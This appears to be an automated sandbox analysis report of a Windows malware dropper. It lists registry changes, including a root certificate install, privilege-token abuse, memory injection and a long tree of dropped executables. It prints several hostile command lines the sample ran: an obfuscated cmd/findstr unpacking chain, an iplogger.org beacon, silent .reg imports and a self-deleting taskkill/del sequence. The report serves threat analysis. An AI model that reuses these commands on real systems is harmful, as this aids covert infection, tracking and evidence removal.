\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\650478DC7424C37C\2 = "1" svchost.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Install.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Install.exe -
Runs .reg file with regedit 2 IoCs
pid Process 7048 regedit.exe 6516 regedit.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5516 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4876 rundll32.exe 4876 rundll32.exe 2036 svchost.exe 2036 svchost.exe 4396 pub2.exe 4396 pub2.exe 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found 3008 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4396 pub2.exe 4528 MicrosoftEdgeCP.exe 4528 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2320 MicrosoftEdge.exe Token: SeDebugPrivilege 2320 MicrosoftEdge.exe Token: SeDebugPrivilege 2320 MicrosoftEdge.exe Token: SeDebugPrivilege 2320 MicrosoftEdge.exe Token: SeCreateTokenPrivilege 4316 Install.exe Token: SeAssignPrimaryTokenPrivilege 4316 Install.exe Token: SeLockMemoryPrivilege 4316 Install.exe Token: SeIncreaseQuotaPrivilege 4316 Install.exe Token: SeMachineAccountPrivilege 4316 Install.exe Token: SeTcbPrivilege 4316 Install.exe Token: SeSecurityPrivilege 4316 Install.exe Token: SeTakeOwnershipPrivilege 4316 Install.exe Token: SeLoadDriverPrivilege 4316 Install.exe Token: SeSystemProfilePrivilege 4316 Install.exe Token: SeSystemtimePrivilege 4316 Install.exe Token: SeProfSingleProcessPrivilege 4316 Install.exe Token: SeIncBasePriorityPrivilege 4316 Install.exe Token: SeCreatePagefilePrivilege 4316 Install.exe Token: SeCreatePermanentPrivilege 4316 Install.exe Token: SeBackupPrivilege 4316 Install.exe Token: SeRestorePrivilege 4316 Install.exe Token: SeShutdownPrivilege 4316 Install.exe Token: SeDebugPrivilege 4316 Install.exe Token: SeAuditPrivilege 4316 Install.exe Token: SeSystemEnvironmentPrivilege 4316 Install.exe Token: SeChangeNotifyPrivilege 4316 Install.exe Token: SeRemoteShutdownPrivilege 4316 Install.exe Token: SeUndockPrivilege 4316 Install.exe Token: SeSyncAgentPrivilege 4316 Install.exe Token: SeEnableDelegationPrivilege 4316 Install.exe Token: SeManageVolumePrivilege 4316 Install.exe Token: SeImpersonatePrivilege 4316 Install.exe Token: SeCreateGlobalPrivilege 4316 Install.exe Token: 31 4316 Install.exe Token: 32 4316 Install.exe Token: 33 4316 Install.exe Token: 34 4316 Install.exe Token: 35 4316 Install.exe Token: SeDebugPrivilege 4212 KRSetp.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 2036 svchost.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4876 rundll32.exe Token: SeDebugPrivilege 4984 taskkill.exe Token: SeAssignPrimaryTokenPrivilege 2744 svchost.exe Token: SeIncreaseQuotaPrivilege 2744 svchost.exe Token: SeSecurityPrivilege 2744 svchost.exe Token: SeTakeOwnershipPrivilege 2744 svchost.exe Token: SeLoadDriverPrivilege 2744 svchost.exe Token: SeSystemtimePrivilege 2744 svchost.exe Token: SeBackupPrivilege 2744 svchost.exe Token: SeRestorePrivilege 2744 svchost.exe Token: SeShutdownPrivilege 2744 svchost.exe Token: SeSystemEnvironmentPrivilege 2744 svchost.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 2112 File.exe 2112 File.exe 2112 File.exe 2112 File.exe 3008 Process not Found 3008 Process not Found -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2112 File.exe 2112 File.exe 2112 File.exe 2112 File.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2320 MicrosoftEdge.exe 4248 Info.exe 4528 MicrosoftEdgeCP.exe 4528 MicrosoftEdgeCP.exe 5612 PqvGsfeLzoFewvfPJpfwL5el.exe 5660 Qme2sFpaAjRiZgbn9sDjN91x.exe 6048 RO3QNbYnukhvSgCvLm09jbuj.exe 6092 wcvBkjEvJwuMtZyCqWUE6pBz.exe 6068 TlTunaSTsvMnMn1ZPIfAsKr9.exe 5132 EmTzd0lcH7R71dNGqBDqz17C.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3008 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1400 wrote to memory of 3916 1400 88A990A868EADA802839185B6F05C541.exe 75 PID 1400 wrote to memory of 3916 1400 88A990A868EADA802839185B6F05C541.exe 75 PID 1400 wrote to memory of 3916 1400 88A990A868EADA802839185B6F05C541.exe 75 PID 3916 wrote to memory of 2112 3916 Files.exe 77 PID 3916 wrote to memory of 2112 3916 Files.exe 77 PID 3916 wrote to memory of 2112 3916 Files.exe 77 PID 1400 wrote to memory of 4168 1400 88A990A868EADA802839185B6F05C541.exe 81 PID 1400 wrote to memory of 4168 1400 88A990A868EADA802839185B6F05C541.exe 81 PID 1400 wrote to memory of 4168 1400 88A990A868EADA802839185B6F05C541.exe 81 PID 1400 wrote to memory of 4212 1400 88A990A868EADA802839185B6F05C541.exe 82 PID 1400 wrote to memory of 4212 1400 88A990A868EADA802839185B6F05C541.exe 82 PID 1400 wrote to memory of 4248 1400 88A990A868EADA802839185B6F05C541.exe 84 PID 1400 wrote to memory of 4248 1400 88A990A868EADA802839185B6F05C541.exe 84 PID 1400 wrote to memory of 4248 1400 88A990A868EADA802839185B6F05C541.exe 84 PID 1400 wrote to memory of 4292 1400 88A990A868EADA802839185B6F05C541.exe 86 PID 1400 wrote to memory of 4292 1400 88A990A868EADA802839185B6F05C541.exe 86 PID 1400 wrote to memory of 4292 1400 88A990A868EADA802839185B6F05C541.exe 86 PID 1400 wrote to memory of 4316 1400 88A990A868EADA802839185B6F05C541.exe 85 PID 1400 wrote to memory of 4316 1400 88A990A868EADA802839185B6F05C541.exe 85 PID 1400 wrote to memory of 4316 1400 88A990A868EADA802839185B6F05C541.exe 85 PID 1400 wrote to memory of 4396 1400 88A990A868EADA802839185B6F05C541.exe 87 PID 1400 wrote to memory of 4396 1400 88A990A868EADA802839185B6F05C541.exe 87 PID 1400 wrote to memory of 4396 1400 88A990A868EADA802839185B6F05C541.exe 87 PID 4168 wrote to memory of 4516 4168 Folder.exe 89 PID 4168 wrote to memory of 4516 4168 Folder.exe 89 PID 4168 wrote to memory of 4516 4168 Folder.exe 89 PID 4820 wrote to memory of 4876 4820 rUNdlL32.eXe 94 PID 4820 wrote to memory of 4876 4820 rUNdlL32.eXe 94 PID 4820 wrote to memory of 4876 4820 rUNdlL32.eXe 94 PID 4876 wrote to memory of 2036 4876 rundll32.exe 69 PID 2036 wrote to memory of 4964 2036 svchost.exe 95 PID 2036 wrote to memory of 4964 2036 svchost.exe 95 PID 4876 wrote to memory of 2664 4876 rundll32.exe 28 PID 2036 wrote to memory of 4964 2036 svchost.exe 95 PID 4876 wrote to memory of 1020 4876 rundll32.exe 60 PID 4876 wrote to memory of 2464 4876 rundll32.exe 31 PID 4876 wrote to memory of 2432 4876 rundll32.exe 32 PID 4876 wrote to memory of 1076 4876 rundll32.exe 56 PID 4876 wrote to memory of 924 4876 rundll32.exe 57 PID 4876 wrote to memory of 1428 4876 rundll32.exe 48 PID 4316 wrote to memory of 4472 4316 Install.exe 97 PID 4316 wrote to memory of 4472 4316 Install.exe 97 PID 4316 wrote to memory of 4472 4316 Install.exe 97 PID 4876 wrote to memory of 1904 4876 rundll32.exe 40 PID 4876 wrote to memory of 1204 4876 rundll32.exe 52 PID 4876 wrote to memory of 1324 4876 rundll32.exe 50 PID 4876 wrote to memory of 2744 4876 rundll32.exe 25 PID 4876 wrote to memory of 2756 4876 rundll32.exe 13 PID 4472 wrote to memory of 4984 4472 cmd.exe 99 PID 4472 wrote to memory of 4984 4472 cmd.exe 99 PID 4472 wrote to memory of 4984 4472 cmd.exe 99 PID 4528 wrote to memory of 4976 4528 MicrosoftEdgeCP.exe 103 PID 4528 wrote to memory of 4976 4528 MicrosoftEdgeCP.exe 103 PID 4528 wrote to memory of 4976 4528 MicrosoftEdgeCP.exe 103 PID 4528 wrote to memory of 4976 4528 MicrosoftEdgeCP.exe 103 PID 4248 wrote to memory of 5480 4248 Info.exe 109 PID 4248 wrote to memory of 5480 4248 Info.exe 109 PID 4248 wrote to memory of 5480 4248 Info.exe 109 PID 4248 wrote to memory of 5512 4248 Info.exe 108 PID 4248 wrote to memory of 5512 4248 Info.exe 108 PID 4248 wrote to memory of 5512 4248 Info.exe 108 PID 4248 wrote to memory of 5540 4248 Info.exe 114 PID 4248 wrote to memory of 5540 4248 Info.exe 114 PID 4248 wrote to memory of 5540 4248 Info.exe 114
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2756
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2664
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2464
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2432
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1904
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1428
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1324
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1204
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1076
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:924
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\88A990A868EADA802839185B6F05C541.exe"C:\Users\Admin\AppData\Local\Temp\88A990A868EADA802839185B6F05C541.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
PID:4516
-
-
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Users\Admin\Documents\WGbVcIBAsQcSiFMmqHFE8wq9.exe"C:\Users\Admin\Documents\WGbVcIBAsQcSiFMmqHFE8wq9.exe"3⤵
- Executes dropped EXE
PID:5512 -
C:\Users\Admin\Documents\WGbVcIBAsQcSiFMmqHFE8wq9.exeC:\Users\Admin\Documents\WGbVcIBAsQcSiFMmqHFE8wq9.exe4⤵PID:1336
-
-
C:\Users\Admin\Documents\WGbVcIBAsQcSiFMmqHFE8wq9.exeC:\Users\Admin\Documents\WGbVcIBAsQcSiFMmqHFE8wq9.exe4⤵PID:6028
-
-
-
C:\Users\Admin\Documents\bz7NidxgK752OQuKGpXs5iwz.exe"C:\Users\Admin\Documents\bz7NidxgK752OQuKGpXs5iwz.exe"3⤵
- Executes dropped EXE
PID:5480 -
C:\Users\Admin\Documents\bz7NidxgK752OQuKGpXs5iwz.exeC:\Users\Admin\Documents\bz7NidxgK752OQuKGpXs5iwz.exe4⤵PID:4836
-
-
-
C:\Users\Admin\Documents\PqvGsfeLzoFewvfPJpfwL5el.exe"C:\Users\Admin\Documents\PqvGsfeLzoFewvfPJpfwL5el.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5612 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp4⤵PID:5276
-
C:\Windows\SysWOW64\cmd.execmd5⤵PID:4900
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp6⤵PID:5764
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comAcre.exe.com k6⤵PID:5828
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k7⤵PID:1268
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 306⤵
- Runs ping.exe
PID:5516
-
-
-
-
-
C:\Users\Admin\Documents\7C0sF6DCguOrqWtIfI8Y5Fw2.exe"C:\Users\Admin\Documents\7C0sF6DCguOrqWtIfI8Y5Fw2.exe"3⤵
- Executes dropped EXE
PID:5588
-
-
C:\Users\Admin\Documents\ssFqA60ovSmfzaH0YHkP__Bp.exe"C:\Users\Admin\Documents\ssFqA60ovSmfzaH0YHkP__Bp.exe"3⤵
- Executes dropped EXE
PID:5540 -
C:\Users\Admin\Documents\ssFqA60ovSmfzaH0YHkP__Bp.exeC:\Users\Admin\Documents\ssFqA60ovSmfzaH0YHkP__Bp.exe4⤵PID:2312
-
-
-
C:\Users\Admin\Documents\Qme2sFpaAjRiZgbn9sDjN91x.exe"C:\Users\Admin\Documents\Qme2sFpaAjRiZgbn9sDjN91x.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5660 -
C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"4⤵PID:5796
-
C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"5⤵PID:6244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "4⤵PID:4180
-
C:\Windows\SysWOW64\explorer.exeexplorer https://iplogger.org/2LBCU65⤵PID:4244
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s adj.reg5⤵
- Runs .reg file with regedit
PID:7048
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s adj2.reg5⤵
- Runs .reg file with regedit
PID:6516
-
-
-
-
C:\Users\Admin\Documents\seBCf4ZlNLZ9PaeYpIEYTmZ6.exe"C:\Users\Admin\Documents\seBCf4ZlNLZ9PaeYpIEYTmZ6.exe"3⤵
- Executes dropped EXE
PID:5648 -
C:\Users\Admin\Documents\seBCf4ZlNLZ9PaeYpIEYTmZ6.exeC:\Users\Admin\Documents\seBCf4ZlNLZ9PaeYpIEYTmZ6.exe4⤵PID:5404
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im seBCf4ZlNLZ9PaeYpIEYTmZ6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\seBCf4ZlNLZ9PaeYpIEYTmZ6.exe" & del C:\ProgramData\*.dll & exit5⤵PID:6832
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im seBCf4ZlNLZ9PaeYpIEYTmZ6.exe /f6⤵
- Kills process with taskkill
PID:6364
-
-
-
-
-
C:\Users\Admin\Documents\JUaHo_m_PyvcqrF6QEipVMNQ.exe"C:\Users\Admin\Documents\JUaHo_m_PyvcqrF6QEipVMNQ.exe"3⤵
- Executes dropped EXE
PID:6120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 6604⤵
- Program crash
PID:4776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 6724⤵
- Program crash
PID:5656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 6764⤵
- Program crash
PID:4192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 6924⤵
- Program crash
PID:5480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 10884⤵
- Program crash
PID:5576
-
-
-
C:\Users\Admin\Documents\TlTunaSTsvMnMn1ZPIfAsKr9.exe"C:\Users\Admin\Documents\TlTunaSTsvMnMn1ZPIfAsKr9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6068 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"4⤵PID:4604
-
C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\setup_install.exe"5⤵PID:2368
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_2.exe6⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\karotima_2.exekarotima_2.exe7⤵PID:2808
-
C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\karotima_2.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\karotima_2.exe" -a8⤵PID:5860
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_1.exe6⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\7zSCF18B506\karotima_1.exekarotima_1.exe7⤵PID:4680
-
C:\Users\Admin\Documents\Pnz8WdEQby5XYebsoB7OoQ7p.exe"C:\Users\Admin\Documents\Pnz8WdEQby5XYebsoB7OoQ7p.exe"8⤵PID:6592
-
-
C:\Users\Admin\Documents\1CM_B4fPtmf95wMVY3kJJVoN.exe"C:\Users\Admin\Documents\1CM_B4fPtmf95wMVY3kJJVoN.exe"8⤵PID:7092
-
C:\Users\Admin\Documents\1CM_B4fPtmf95wMVY3kJJVoN.exeC:\Users\Admin\Documents\1CM_B4fPtmf95wMVY3kJJVoN.exe9⤵PID:6404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 2410⤵
- Program crash
PID:5408
-
-
-
-
C:\Users\Admin\Documents\kScOjC7j4e_OKZOhOuScw_O6.exe"C:\Users\Admin\Documents\kScOjC7j4e_OKZOhOuScw_O6.exe"8⤵PID:7132
-
C:\Users\Admin\Documents\kScOjC7j4e_OKZOhOuScw_O6.exeC:\Users\Admin\Documents\kScOjC7j4e_OKZOhOuScw_O6.exe9⤵PID:6468
-
-
-
C:\Users\Admin\Documents\LddNQ9bQW1nk2OQ0v1kdpoOR.exe"C:\Users\Admin\Documents\LddNQ9bQW1nk2OQ0v1kdpoOR.exe"8⤵PID:6360
-
C:\Users\Admin\Documents\LddNQ9bQW1nk2OQ0v1kdpoOR.exeC:\Users\Admin\Documents\LddNQ9bQW1nk2OQ0v1kdpoOR.exe9⤵PID:6260
-
-
-
C:\Users\Admin\Documents\A51f3igjY71GJ8OkVigv7WRd.exe"C:\Users\Admin\Documents\A51f3igjY71GJ8OkVigv7WRd.exe"8⤵PID:6392
-
-
C:\Users\Admin\Documents\w9fM7ytZGdYHfXLQbKrKJbaP.exe"C:\Users\Admin\Documents\w9fM7ytZGdYHfXLQbKrKJbaP.exe"8⤵PID:6680
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp9⤵PID:6404
-
C:\Windows\SysWOW64\cmd.execmd10⤵PID:5264
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp11⤵PID:6952
-
-
-
-
-
C:\Users\Admin\Documents\rcZrGiruGiEOay_9GbGkNn5J.exe"C:\Users\Admin\Documents\rcZrGiruGiEOay_9GbGkNn5J.exe"8⤵PID:2524
-
-
C:\Users\Admin\Documents\NDPLDjSfraiGyoB5RxkbB20Y.exe"C:\Users\Admin\Documents\NDPLDjSfraiGyoB5RxkbB20Y.exe"8⤵PID:6672
-
-
C:\Users\Admin\Documents\VYipn39Jx8CFWksFoiAAVMx_.exe"C:\Users\Admin\Documents\VYipn39Jx8CFWksFoiAAVMx_.exe"8⤵PID:6664
-
-
C:\Users\Admin\Documents\oVsr49wXmrGLvqqYXms1l9ID.exe"C:\Users\Admin\Documents\oVsr49wXmrGLvqqYXms1l9ID.exe"8⤵PID:6656
-
C:\Users\Admin\Documents\oVsr49wXmrGLvqqYXms1l9ID.exe"C:\Users\Admin\Documents\oVsr49wXmrGLvqqYXms1l9ID.exe"9⤵PID:1840
-
-
-
C:\Users\Admin\Documents\m2NBwoGR401e0o23CsAbBsRW.exe"C:\Users\Admin\Documents\m2NBwoGR401e0o23CsAbBsRW.exe"8⤵PID:6644
-
-
C:\Users\Admin\Documents\mbQCt7Vi0jt3t7Ekrz7M38ai.exe"C:\Users\Admin\Documents\mbQCt7Vi0jt3t7Ekrz7M38ai.exe"8⤵PID:6636
-
-
C:\Users\Admin\Documents\f0OpjkLZgSgJSp2ShYrgv2xJ.exe"C:\Users\Admin\Documents\f0OpjkLZgSgJSp2ShYrgv2xJ.exe"8⤵PID:6632
-
-
C:\Users\Admin\Documents\wPXGEBN_gKnBDhupoHgOGN4s.exe"C:\Users\Admin\Documents\wPXGEBN_gKnBDhupoHgOGN4s.exe"8⤵PID:6608
-
-
C:\Users\Admin\Documents\rUULchauzCWUt9y_rdMgO2Tg.exe"C:\Users\Admin\Documents\rUULchauzCWUt9y_rdMgO2Tg.exe"8⤵PID:6588
-
-
C:\Users\Admin\Documents\EtFIJ6vOUrinBA31lO0MlAHL.exe"C:\Users\Admin\Documents\EtFIJ6vOUrinBA31lO0MlAHL.exe"8⤵PID:6580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 6609⤵
- Program crash
PID:1928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 6729⤵
- Program crash
PID:4324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 7849⤵
- Program crash
PID:6956
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 8209⤵
- Program crash
PID:4700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 10809⤵
- Program crash
PID:5288
-
-
-
C:\Users\Admin\Documents\lMX5uVbn8GYkmCXZIPhaOGGT.exe"C:\Users\Admin\Documents\lMX5uVbn8GYkmCXZIPhaOGGT.exe"8⤵PID:6568
-
C:\Users\Admin\Documents\lMX5uVbn8GYkmCXZIPhaOGGT.exeC:\Users\Admin\Documents\lMX5uVbn8GYkmCXZIPhaOGGT.exe9⤵PID:7096
-
-
C:\Users\Admin\Documents\lMX5uVbn8GYkmCXZIPhaOGGT.exeC:\Users\Admin\Documents\lMX5uVbn8GYkmCXZIPhaOGGT.exe9⤵PID:5440
-
-
-
C:\Users\Admin\Documents\VGzavJkVdEQ1slkBwJlUEhkT.exe"C:\Users\Admin\Documents\VGzavJkVdEQ1slkBwJlUEhkT.exe"8⤵PID:5608
-
-
C:\Users\Admin\Documents\gEojMin8A_YoTm8Q6LwN4pIt.exe"C:\Users\Admin\Documents\gEojMin8A_YoTm8Q6LwN4pIt.exe"8⤵PID:5632
-
-
